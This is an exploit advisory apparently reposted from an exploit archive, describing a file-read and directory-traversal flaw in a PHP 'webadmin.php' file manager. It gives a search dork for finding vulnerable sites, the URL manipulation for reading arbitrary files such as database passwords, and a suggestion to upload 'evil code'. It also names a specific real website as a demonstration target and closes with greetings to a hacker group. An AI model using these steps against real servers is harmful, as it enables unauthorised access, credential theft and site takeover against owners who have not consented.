Exploit for php platform in category web applications
==========================================================
Read local Config File source (webadmin.php) Vulnerability
==========================================================
Author : DrgpxX
Group : Aras cyber Army
Email : [email protected]
Discover : 13 june 2010
Critical Lvl : high
Publised : 15 june 2010
---------------------------------------------------------------------------
Read local Config File source (webadmin.php)
~~~~~~~~~
Dork : Inurl:"webadmin.php"
~~~~~~~~~~~~~~~~~~
For read config file or etc just Click on change button and next url must be
like :: webadmin.php?id=drq8bvtuvhhqhq4ka8vcg11kn3&dir=%2Fvar%2Fwww%2Fvhosts%2target.com%2Fhttpdocs%2F
now clear id=drq8bvtuvhhqhq4ka8vcg11kn3& in url and write ur file to read source like
dir=index.php
wow ! now u can read data like dbpass traversing directories hijacking source file and etc
IF upload enabled!
you can upload Your evil Code !
~~~~~~~~~~~~~~~~~~~~~~~~~
demp site : just for edu)
http://www.albania-sport.com/webadmin.php
+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
D3stan,grtl,mehdi,hamed.err000r
All Muslim , Turkish , iranian hackers
+++++++++++++++++++++++++++++++++++++++
# 0day.today [2018-04-08] #